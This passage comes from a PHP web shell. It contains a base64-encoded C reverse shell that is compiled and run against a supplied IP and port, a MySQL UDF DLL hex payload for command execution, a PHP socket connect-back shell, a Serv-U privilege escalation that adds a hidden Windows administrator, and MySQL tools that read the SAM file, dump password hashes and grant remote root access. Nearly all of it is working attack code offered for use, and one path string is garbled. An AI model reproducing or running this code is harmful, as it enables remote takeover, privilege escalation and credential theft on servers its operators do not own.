"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
|
|||
|
|
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
|
|||
|
|
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
|
|||
|
|
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
|
|||
|
|
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
|
|||
|
|
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
|
|||
|
|
echo File_Write('/tmp/b4che10r_bc.c',base64_decode($back_connect_c),'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c faild</font><br>';
|
|||
|
|
$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
|
|||
|
|
@unlink('/tmp/b4che10r_bc.c');
|
|||
|
|
echo Exec_Run('/tmp/b4che10r_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? '<font style=font:11pt color=ff0000>execute command successfully</font>' : '<font style=font:11pt color=ff0000>execute command faild</font>';
|
|||
|
|
}
|
|||
|
|
echo '<br>local machine need run (nc -vv -l -p '.$_POST['yourport'].')';
|
|||
|
|
}
|
|||
|
|
echo '</div>';
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//mysql udf
|
|||
|
|
function get_code() {
|
|||
|
|
return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Mysql_m()
|
|||
|
|
{
|
|||
|
|
extract($_POST);
|
|||
|
|
extract($_GET);
|
|||
|
|
$mysql_hostname = $mysql_hostname?$mysql_hostname : "127.0.0.1";
|
|||
|
|
$mysql_username = $mysql_username?$mysql_username : "root";
|
|||
|
|
$post_sql = $post_sql ? $post_sql : "select state(\"net user\")";
|
|||
|
|
$mysql_dbname = $mysql_dbname ? $mysql_dbname : "mysql";
|
|||
|
|
if($install){
|
|||
|
|
$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
|
|||
|
|
mysql_select_db($mysql_dbname,$link) or die(mysql_error());
|
|||
|
|
@mysql_query("DROP TABLE udf_temp", $link);
|
|||
|
|
$query="CREATE TABLE udf_temp (udf BLOB);";
|
|||
|
|
if(!($result=mysql_query($query, $link)))
|
|||
|
|
die('error:create temp table udf_temp error.'.mysql_error());
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
$code=get_code();
|
|||
|
|
$query="INSERT into udf_temp values (CONVERT($code,CHAR));";
|
|||
|
|
if(!mysql_query($query, $link))
|
|||
|
|
{
|
|||
|
|
mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
|
|||
|
|
die('error:insert DLL error.'.mysql_error());
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
$dllname = "mysqlDll.dll";
|
|||
|
|
if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
|
|||
|
|
elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll";
|
|||
|
|
|
|||
|
|
if(file_exists($dir)) {
|
|||
|
|
$time = time();
|
|||
|
|
$dir = str_replace("mysqlDll","mysqlDll_$time",$dir);
|
|||
|
|
$dllname = str_replace("mysqlDll","mysqlDll_$time",$dllname);
|
|||
|
|
}
|
|||
|
|
$query = "SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
|
|||
|
|
if(!mysql_query($query, $link))
|
|||
|
|
{
|
|||
|
|
die("export dll error:maybe dll is no priv or $dir is exists".mysql_error());
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
echo '<font style=font:11pt color=ff0000>install dll success'.$dir.'</font><br>';
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
|
|||
|
|
$result = mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error());
|
|||
|
|
if($result) {
|
|||
|
|
echo "install success <br><a href='?'>back</a>";
|
|||
|
|
exit();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
?>
|
|||
|
|
<form method="post" action="?s=m"><br><br>
|
|||
|
|
<div class="actall">Host: <input name="mysql_hostname" value="<?echo $mysql_hostname;?>" type="text" style="width:100px" >
|
|||
|
|
User: <input name="mysql_username" value="<?echo $mysql_username;?>" type="text" style="width:70px">
|
|||
|
|
Password: <input type="password" name="mysql_passwd" value="<?echo $mysql_passwd;?>" style="width:70px">
|
|||
|
|
DB: <input name="mysql_dbname" value="<?echo $mysql_dbname;?>" type="text" style="width:70px">
|
|||
|
|
<input class="bt" name="install" type="submit" value="install">
|
|||
|
|
<br>
|
|||
|
|
<br>
|
|||
|
|
sql statement:<br>
|
|||
|
|
<textarea name="post_sql" cols="80" rows="10"><?echo stripslashes($post_sql);?>
|
|||
|
|
</textarea>
|
|||
|
|
<br> <br>
|
|||
|
|
<input class="bt" name="" type="submit" value="execute">
|
|||
|
|
</form><br>back screen:</div>
|
|||
|
|
<?
|
|||
|
|
if ($_POST[post_sql]) {
|
|||
|
|
$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
|
|||
|
|
if($mysql_dbname) mysql_select_db($mysql_dbname,$link) or die(mysql_error());
|
|||
|
|
$query = stripslashes($post_sql);
|
|||
|
|
$result = mysql_query($query, $link) or die(mysql_error());
|
|||
|
|
?>
|
|||
|
|
<br>
|
|||
|
|
<textarea name="post_sql" style="width:610px;height:180px;">
|
|||
|
|
<?
|
|||
|
|
echo ($result) ? "Done:$result\n\n" : "error:$result\n\n ".mysql_error();
|
|||
|
|
while ($row = @mysql_fetch_array ($result)) {
|
|||
|
|
print_r ($row);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
?>
|
|||
|
|
</textarea>
|
|||
|
|
<?
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//win back connect - php socket
|
|||
|
|
|
|||
|
|
function phpsocket()
|
|||
|
|
{
|
|||
|
|
@set_time_limit(0);
|
|||
|
|
$system=strtoupper(substr(PHP_OS, 0, 3));
|
|||
|
|
if(!extension_loaded('sockets'))
|
|||
|
|
{
|
|||
|
|
if ($system == 'WIN') {
|
|||
|
|
@dl('php_sockets.dll') or die("Can't load socket");
|
|||
|
|
}else{
|
|||
|
|
@dl('sockets.so') or die("Can't load socket");
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
if(isset($_POST['host']) && isset($_POST['port']))
|
|||
|
|
{
|
|||
|
|
$host = $_POST['host'];
|
|||
|
|
$port = $_POST['port'];
|
|||
|
|
}else{
|
|||
|
|
print<<<eof
|
|||
|
|
<html>
|
|||
|
|
<br><br>
|
|||
|
|
<body>
|
|||
|
|
<div class="actall"><h5>reverse cmdshell with php socket;<br>the extension php_sockets should be openned;<br>please check phpinfo();<br>code by <a href=http://www.Wolvez.org><font color=#FF67A0>Maple-X</font></a><br></h5><br></div>
|
|||
|
|
<form method=post action="?s=r">
|
|||
|
|
<div class="actall"><br>Host:<input type=text name=host value="">  
|
|||
|
|
Port:<input type=text name=port value="1120">  <br><br>
|
|||
|
|
<input type="radio" name=info value="linux" checked>Linux
|
|||
|
|
<input type="radio" name=info value="win">Win  
|
|||
|
|
<input class="bt" type=submit name=submit value="connect">
|
|||
|
|
</form>
|
|||
|
|
</body>
|
|||
|
|
</html>
|
|||
|
|
eof;
|
|||
|
|
echo '<br><br>';
|
|||
|
|
}
|
|||
|
|
if($system=="WIN")
|
|||
|
|
{
|
|||
|
|
$env=array('path' => 'c:\\windows\\system32');
|
|||
|
|
}else{
|
|||
|
|
$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
|
|||
|
|
}
|
|||
|
|
$descriptorspec = array(
|
|||
|
|
0 => array("pipe","r"),
|
|||
|
|
1 => array("pipe","w"),
|
|||
|
|
2 => array("pipe","w"),
|
|||
|
|
);
|
|||
|
|
$host=gethostbyname($host);
|
|||
|
|
$proto=getprotobyname("tcp");
|
|||
|
|
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0)
|
|||
|
|
{
|
|||
|
|
die("Socket Create Faile");
|
|||
|
|
}
|
|||
|
|
if(($ret=socket_connect($sock,$host,$port))<0)
|
|||
|
|
{
|
|||
|
|
die("Connect Faile");
|
|||
|
|
}else{
|
|||
|
|
$message="----------------------PHP Connect-Back--------------------\n";
|
|||
|
|
socket_write($sock,$message,strlen($message));
|
|||
|
|
$cwd=str_replace('\\','/',dirname(__FILE__));
|
|||
|
|
while($cmd=socket_read($sock,65535,$proto))
|
|||
|
|
{
|
|||
|
|
if(trim(strtolower($cmd))=="exit")
|
|||
|
|
{
|
|||
|
|
socket_write($sock,"Bye Bye\n");
|
|||
|
|
exit;
|
|||
|
|
}else{
|
|||
|
|
|
|||
|
|
$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
|
|||
|
|
if (is_resource($process)) {
|
|||
|
|
fwrite($pipes[0], $cmd);
|
|||
|
|
fclose($pipes[0]);
|
|||
|
|
|
|||
|
|
$msg=stream_get_contents($pipes[1]);
|
|||
|
|
socket_write($sock,$msg,strlen($msg));
|
|||
|
|
fclose($pipes[1]);
|
|||
|
|
|
|||
|
|
$msg=stream_get_contents($pipes[2]);
|
|||
|
|
socket_write($sock,$msg,strlen($msg));
|
|||
|
|
$return_value = proc_close($process);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
//serv-u
|
|||
|
|
function su()
|
|||
|
|
{
|
|||
|
|
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
|
|||
|
|
print<<<END
|
|||
|
|
<div class="actall"><a href="?s=z">[Exec Command]</a> <a href="?s=z&o=adduser">[Add User]</a></div>
|
|||
|
|
<form method="POST">
|
|||
|
|
<div class="actall">SU_Port <input name="SUPort" type="text" value="43958" style="width:300px"></div>
|
|||
|
|
<div class="actall">SU_User <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
|
|||
|
|
<div class="actall">SU_Pass <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
|
|||
|
|
END;
|
|||
|
|
if($_GET['o'] == 'adduser')
|
|||
|
|
{
|
|||
|
|
print<<<END
|
|||
|
|
<div class="actall">Username <input name="user" type="text" value="spider" style="width:100px">
|
|||
|
|
Password <input name="password" type="text" value="spider" style="width:100px">
|
|||
|
|
Directory <input name="part" type="text" value="C:\\\\" style="width:150px"></div>
|
|||
|
|
END;
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
print<<<END
|
|||
|
|
<div class="actall">Command <input name="SUCommand" type="text" value="net user b4che10r 123456 /add & net localgroup administrators b4che10r /add" style="width:600px"><br>
|
|||
|
|
<input name="user" type="hidden" value="b4che10r">
|
|||
|
|
<input name="password" type="hidden" value="123456">
|
|||
|
|
<input name="part" type="hidden" value="C:\\\\"></div>
|
|||
|
|
END;
|
|||
|
|
}
|
|||
|
|
echo '<div class="actall"><input class="bt" type="submit" value="Exec" style="width:80px;"></div></form>';
|
|||
|
|
if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
|
|||
|
|
{
|
|||
|
|
echo '<div class="actall">';
|
|||
|
|
$sendbuf = "";
|
|||
|
|
$recvbuf = "";
|
|||
|
|
$domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
|
|||
|
|
$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
|
|||
|
|
"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
|
|||
|
|
"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
|
|||
|
|
$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
|
|||
|
|
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
|
|||
|
|
$recvbuf = @fgets($sock, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
|
|||
|
|
@fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: $sendbuf <br>";
|
|||
|
|
$recvbuf = @fgets($sock, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
|
|||
|
|
@fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: $sendbuf <br>";
|
|||
|
|
$recvbuf = @fgets($sock, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = "SITE MAINTENANCE\r\n";
|
|||
|
|
@fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: $sendbuf <br>";
|
|||
|
|
$recvbuf = @fgets($sock, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = $domain;
|
|||
|
|
@fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: $sendbuf <br>";
|
|||
|
|
$recvbuf = @fgets($sock, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = $adduser;
|
|||
|
|
@fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: $sendbuf <br>";
|
|||
|
|
$recvbuf = @fgets($sock, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
if(!empty($_POST['SUCommand']))
|
|||
|
|
{
|
|||
|
|
$exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);
|
|||
|
|
$recvbuf = @fgets($exp, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = "USER ".$_POST['user']."\r\n";
|
|||
|
|
@fputs($exp, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: $sendbuf <br>";
|
|||
|
|
$recvbuf = @fgets($exp, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = "PASS ".$_POST['password']."\r\n";
|
|||
|
|
@fputs($exp, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: $sendbuf <br>";
|
|||
|
|
$recvbuf = @fgets($exp, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
|
|||
|
|
@fputs($exp, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
|
|||
|
|
$recvbuf = @fgets($exp, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
$sendbuf = $deldomain;
|
|||
|
|
@fputs($sock, $sendbuf, strlen($sendbuf));
|
|||
|
|
echo "Data send: $sendbuf <br>";
|
|||
|
|
$recvbuf = @fgets($sock, 1024);
|
|||
|
|
echo "Data receive: $recvbuf <br>";
|
|||
|
|
@fclose($exp);
|
|||
|
|
}
|
|||
|
|
@fclose($sock);
|
|||
|
|
echo '</div>';
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//mysql statement
|
|||
|
|
|
|||
|
|
function Mysql_n()
|
|||
|
|
{
|
|||
|
|
$MSG_BOX = ' ';
|
|||
|
|
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
|
|||
|
|
if(isset($_POST['mhost']) && isset($_POST['muser']))
|
|||
|
|
{
|
|||
|
|
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
|
|||
|
|
if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
|
|||
|
|
else $MSG_BOX = 'Connect to mysql faild ';
|
|||
|
|
}
|
|||
|
|
$downfile = 'c:/windows/repair/sam';
|
|||
|
|
if(!empty($_POST['downfile']))
|
|||
|
|
{
|
|||
|
|
$downfile = File_Str($_POST['downfile']);
|
|||
|
|
$binpath = bin2hex($downfile);
|
|||
|
|
$query = 'select load_file(0x'.$binpath.')';
|
|||
|
|
if($result = @mysql_query($query,$conn))
|
|||
|
|
{
|
|||
|
|
$k = 0; $downcode = '';
|
|||
|
|
while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
|
|||
|
|
$filedown = basename($downfile);
|
|||
|
|
if(!$filedown) $filedown = 'b4che10r.tmp';
|
|||
|
|
$array = explode('.', $filedown);
|
|||
|
|
$arrayend = array_pop($array);
|
|||
|
|
header('Content-type: application/x-'.$arrayend);
|
|||
|
|
header('Content-Disposition: attachment; filename='.$filedown);
|
|||
|
|
header('Content-Length: '.strlen($downcode));
|
|||
|
|
echo $downcode;
|
|||
|
|
exit;
|
|||
|
|
}
|
|||
|
|
else $MSG_BOX = 'Download file faild';
|
|||
|
|
}
|
|||
|
|
$o = isset($_GET['o']) ? $_GET['o'] : '';
|
|||
|
|
Root_CSS();
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="nform" id="nform" action="?s=n&o={$o}" enctype="multipart/form-data">
|
|||
|
|
<center><div class="actall"><a href="?s=n">[execute Mysql statement]</a>
|
|||
|
|
<a href="?s=n&o=u">[Mysql upfile]</a>
|
|||
|
|
<a href="?s=n&o=d">[Mysql download file]</a></div>
|
|||
|
|
<div class="actall">
|
|||
|
|
IP: <input type="text" name="mhost" value="{$mhost}" style="width:110px">
|
|||
|
|
Port: <input type="text" name="mport" value="{$mport}" style="width:110px">
|
|||
|
|
User: <input type="text" name="muser" value="{$muser}" style="width:110px">
|
|||
|
|
Pass: <input type="text" name="mpass" value="{$mpass}" style="width:110px">
|
|||
|
|
Dbname: <input type="text" name="mdata" value="{$mdata}" style="width:110px">
|
|||
|
|
</div>
|
|||
|
|
<div class="actall" style="height:220px;">
|
|||
|
|
END;
|
|||
|
|
if($o == 'u')
|
|||
|
|
{
|
|||
|
|
$uppath = 'C:/Documents and Settings/All Users/<2F><><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD>˵<EFBFBD>/<2F><><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD>/exp.vbs';
|
|||
|
|
if(!empty($_POST['uppath']))
|
|||
|
|
{
|
|||
|
|
$uppath = $_POST['uppath'];
|
|||
|
|
$query = 'Create TABLE a (cmd text NOT NULL);';
|
|||
|
|
if(@mysql_query($query,$conn))
|
|||
|
|
{
|
|||
|
|
if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
|
|||
|
|
else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
|
|||
|
|
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
|
|||
|
|
if(@mysql_query($query,$conn))
|
|||
|
|
{
|
|||
|
|
$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
|
|||
|
|
$MSG_BOX = @mysql_query($query,$conn) ? 'upfile success' : 'upfile faild';
|
|||
|
|
}
|
|||
|
|
else $MSG_BOX = 'insert into temp table faild';
|
|||
|
|
@mysql_query('Drop TABLE IF EXISTS a;',$conn);
|
|||
|
|
}
|
|||
|
|
else $MSG_BOX = 'create temp table faild';
|
|||
|
|
}
|
|||
|
|
print<<<END
|
|||
|
|
<br><br>Path: <input type="text" name="uppath" value="{$uppath}" style="width:500px">
|
|||
|
|
<br><br>File:  <input type="file" name="upfile" style="width:500px;height:22px;">
|
|||
|
|
</div><div class="actall"><input class="bt" type="submit" value="upfile">
|
|||
|
|
END;
|
|||
|
|
}
|
|||
|
|
elseif($o == 'd')
|
|||
|
|
{
|
|||
|
|
print<<<END
|
|||
|
|
<br><br><br>download file: <input type="text" name="downfile" value="{$downfile}" style="width:500px">
|
|||
|
|
</div><div class="actall"><input class="bt" type="submit" value="Download">
|
|||
|
|
END;
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
print<<<END
|
|||
|
|
<script language="javascript">
|
|||
|
|
function nFull(i){
|
|||
|
|
Str = new Array(15);
|
|||
|
|
Str[0] = "select command Or input manual";
|
|||
|
|
Str[1] = "select version();";
|
|||
|
|
Str[2] = "select @@character_set_database;";
|
|||
|
|
Str[3] = "show databases;";
|
|||
|
|
Str[4] = "show tables;";
|
|||
|
|
Str[5] = "show columns from table_name;";
|
|||
|
|
Str[6] = "select @@hostname;";
|
|||
|
|
Str[7] = "select @@version_compile_os;";
|
|||
|
|
Str[8] = "select @@basedir;";
|
|||
|
|
Str[9] = "select @@datadir;";
|
|||
|
|
Str[10] = "describe table_name;";
|
|||
|
|
Str[11] = "select User,Password from mysql.user;";
|
|||
|
|
Str[12] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);";
|
|||
|
|
Str[13] = "select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;";
|
|||
|
|
Str[14] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
|
|||
|
|
nform.msql.value = Str[i];
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
|
|||
|
|
<div class="actall">
|
|||
|
|
<select onchange="return nFull(options[selectedIndex].value)">
|
|||
|
|
<option value="0" selected>command</option>
|
|||
|
|
<option value="1">version</option>
|
|||
|
|
<option value="2">charset</option>
|
|||
|
|
<option value="3">databases</option>
|
|||
|
|
<option value="4">tables</option>
|
|||
|
|
<option value="5">columns</option>
|
|||
|
|
<option value="6">hostname</option>
|
|||
|
|
<option value="7">version_compile_os</option>
|
|||
|
|
<option value="8">basedir</option>
|
|||
|
|
<option value="9">datadir</option>
|
|||
|
|
<option value="10">describe</option>
|
|||
|
|
<option value="11">hashes</option>
|
|||
|
|
<option value="12">load_file</option>
|
|||
|
|
<option value="13">into dumpfile</option>
|
|||
|
|
<option value="14">skip_network</option>
|
|||
|
|
</select>
|
|||
|
|
<input class="bt" type="submit" value="execute">
|
|||
|
|
END;
|
|||
|
|
if(!empty($_POST['msql']))
|
|||
|
|
|
|||
|
|
{
|
|||
|
|
$msql = $_POST['msql'];
|
|||
|
|
if($result = @mysql_query($msql,$conn))
|
|||
|
|
{
|
|||
|
|
$MSG_BOX = 'execute sql statement success<br>';
|
|||
|
|
$row=mysql_fetch_row($result);
|
|||
|
|
echo '<table border="1" cellpadding="1" cellspacing="2">'."<tr>";
|
|||
|
|
for ($i=0; $i<mysql_num_fields($result); $i++)
|
|||
|
|
{
|
|||
|
|
echo '<td><b>'.mysql_field_name($result, $i)."</b></td>";
|
|||
|
|
}
|
|||
|
|
echo "</tr>";
|
|||
|
|
mysql_data_seek($result, 0);
|
|||
|
|
while ($row=mysql_fetch_row($result))
|
|||
|
|
{
|
|||
|
|
echo "<tr>";
|
|||
|
|
for ($i=0; $i<mysql_num_fields($result); $i++ )
|
|||
|
|
{
|
|||
|
|
echo '<td>'."$row[$i]".'</td>';
